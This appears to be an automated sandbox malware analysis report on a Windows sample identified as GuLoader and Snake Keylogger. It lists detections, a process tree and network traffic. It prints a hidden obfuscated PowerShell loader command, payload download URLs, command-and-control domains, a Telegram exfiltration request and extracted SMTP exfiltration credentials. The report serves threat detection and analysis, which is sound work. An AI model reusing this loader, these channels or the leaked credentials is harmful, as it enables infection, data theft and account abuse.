Edit tour

Windows Analysis Report
rPedidoactualizado.exe

Overview

General Information

Sample name:	rPedidoactualizado.exe
Analysis ID:	1528590
MD5:	e3ca439a218a7eeb9432b91fbf185559
SHA1:	5a55427c13737ea23773ff25476c0590c8ec9b4b
SHA256:	a73a2597cbb4d6a76b2ab9d0664e79ad99d257aab4683f7c68dd1321fa79f34b
Tags:	exeuser-Porcupine
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Early bird code injection technique detected

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Loading BitLocker PowerShell Module

Powershell drops PE file

Queues an APC in another process (thread injection)

Suspicious powershell command line found

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Msiexec Initiated Connection

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

rPedidoactualizado.exe (PID: 2140 cmdline: "C:\Users\user\Desktop\rPedidoactualizado.exe" MD5: E3CA439A218A7EEB9432B91FBF185559)

powershell.exe (PID: 5408 cmdline: "powershell.exe" -windowstyle hidden "$Chlorin=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Nominalbjning.Zon';$Trichogen169=$Chlorin.SubString(55537,3);.$Trichogen169($Chlorin)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 2364 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "barclick@barclick.es", "Password": "1446010", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.3290429199.0000000021441000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000002.00000002.2355081498.00000000096B6000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: msiexec.exe PID: 2364	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: msiexec.exe PID: 2364	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security

Sigma Signatures

System Summary

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 216.58.206.46, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 2364, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49828

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5408, TargetFilename: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\rPedidoactualizado.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Chlorin=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Nominalbjning.Zon';$Trichogen169=$Chlorin.SubString(55537,3);.$Trichogen169($Chlorin)", CommandLine: "powershell.exe" -windowstyle hidden "$Chlorin=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Nominalbjning.Zon';$Trichogen169=$Chlorin.SubString(55537,3);.$Trichogen169($Chlorin)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rPedidoactualizado.exe", ParentImage: C:\Users\user\Desktop\rPedidoactualizado.exe, ParentProcessId: 2140, ParentProcessName: rPedidoactualizado.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Chlorin=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Nominalbjning.Zon';$Trichogen169=$Chlorin.SubString(55537,3);.$Trichogen169($Chlorin)", ProcessId: 5408, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-08T03:32:41.815821+0200	2803305	3	Unknown Traffic	192.168.2.5	49886	188.114.96.3	443	TCP
2024-10-08T03:32:46.415577+0200	2803305	3	Unknown Traffic	192.168.2.5	49922	188.114.96.3	443	TCP
2024-10-08T03:32:47.604805+0200	2803305	3	Unknown Traffic	192.168.2.5	49932	188.114.96.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-08T03:32:40.146299+0200	2803274	2	Potentially Bad Traffic	192.168.2.5	49864	158.101.44.242	80	TCP
2024-10-08T03:32:41.240068+0200	2803274	2	Potentially Bad Traffic	192.168.2.5	49864	158.101.44.242	80	TCP
2024-10-08T03:32:43.458901+0200	2803274	2	Potentially Bad Traffic	192.168.2.5	49892	158.101.44.242	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-08T03:32:34.090406+0200	2803270	2	Potentially Bad Traffic	192.168.2.5	49828	216.58.206.46	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://aborters.duckdns.org:8081	URL Reputation: Label: malware
Source: http://anotherarmy.dns.army:8081	URL Reputation: Label: malware

Found malware configuration

Source: 00000005.00000002.3290429199.0000000021441000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "barclick@barclick.es", "Password": "1446010", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\rPedidoactualizado.exe

Virustotal: Detection: 13%

Perma Link

Multi AV Scanner detection for submitted file

Source: rPedidoactualizado.exe

Virustotal: Detection: 13%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.2% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: rPedidoactualizado.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49880 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.5:49828 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.5:49838 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49966 version: TLS 1.2

Source: rPedidoactualizado.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: stem.Core.pdb source: powershell.exe, 00000002.00000002.2354527727.0000000008DBD000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\rPedidoactualizado.exe	Code function: 0_2_00402868 FindFirstFileW,	0_2_00402868
Source: C:\Users\user\Desktop\rPedidoactualizado.exe	Code function: 0_2_004065DA FindFirstFileW,FindClose,	0_2_004065DA
Source: C:\Users\user\Desktop\rPedidoactualizado.exe	Code function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_004059A9

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 004EF45Dh	5_2_004EF2C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 004EF45Dh	5_2_004EF4AC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 004EF45Dh	5_2_004EF52F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 004EFC19h	5_2_004EF974

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20and%20Time:%2008/10/2024%20/%2010:37:02%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20878411%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49864 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49892 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49922 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49828 -> 216.58.206.46:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49932 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49886 -> 188.114.96.3:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1xptRpTcxilm8Fyo6e-EyPnvXFK0-DkWd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1xptRpTcxilm8Fyo6e-EyPnvXFK0-DkWd&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49880 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1xptRpTcxilm8Fyo6e-EyPnvXFK0-DkWd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1xptRpTcxilm8Fyo6e-EyPnvXFK0-DkWd&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20and%20Time:%2008/10/2024%20/%2010:37:02%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20878411%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 08 Oct 2024 01:32:52 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: msiexec.exe, 00000005.00000002.3290429199.0000000021441000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: msiexec.exe, 00000005.00000002.3290429199.0000000021441000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: msiexec.exe, 00000005.00000002.3290429199.0000000021441000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: msiexec.exe, 00000005.00000002.3290429199.0000000021441000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: powershell.exe, 00000002.00000002.2349073799.0000000007A60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microCI
Source: rPedidoactualizado.exe, rPedidoactualizado.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.2347373016.0000000006338000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2344675031.0000000005426000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2344675031.00000000052D1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3290429199.0000000021441000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: msiexec.exe, 00000005.00000002.3290429199.0000000021441000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: powershell.exe, 00000002.00000002.2344675031.0000000005426000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: msiexec.exe, 00000005.00000002.3292249295.0000000022461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000002.00000002.2344675031.00000000052D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: msiexec.exe, 00000005.00000002.3290429199.0000000021524000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: msiexec.exe, 00000005.00000002.3290429199.0000000021524000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: msiexec.exe, 00000005.00000002.3290429199.0000000021524000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: msiexec.exe, 00000005.00000002.3290429199.0000000021524000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20a
Source: msiexec.exe, 00000005.00000003.2408195744.00000000058F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2408265004.00000000058F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: msiexec.exe, 00000005.00000002.3292249295.0000000022461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: msiexec.exe, 00000005.00000002.3292249295.0000000022461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: msiexec.exe, 00000005.00000002.3292249295.0000000022461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: msiexec.exe, 00000005.00000002.3290429199.0000000021600000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3290429199.00000000215F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: msiexec.exe, 00000005.00000002.3290429199.00000000215F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enN
Source: msiexec.exe, 00000005.00000002.3290429199.00000000215FB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: powershell.exe, 00000002.00000002.2347373016.0000000006338000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2347373016.0000000006338000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2347373016.0000000006338000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: msiexec.exe, 00000005.00000002.3277125256.000000000587A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 00000005.00000002.3277125256.000000000587A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1xptRpTcxilm8Fyo6e-EyPnvXFK0-DkWd
Source: msiexec.exe, 00000005.00000003.2446661266.00000000058F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2415047940.00000000058F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3277125256.00000000058E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: msiexec.exe, 00000005.00000003.2446661266.00000000058F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2415047940.00000000058F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3277125256.00000000058E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/PV
Source: msiexec.exe, 00000005.00000003.2408195744.00000000058F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3277125256.00000000058D8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2408265004.00000000058F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1xptRpTcxilm8Fyo6e-EyPnvXFK0-DkWd&export=download
Source: msiexec.exe, 00000005.00000002.3292249295.0000000022461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: msiexec.exe, 00000005.00000002.3292249295.0000000022461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: msiexec.exe, 00000005.00000002.3292249295.0000000022461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
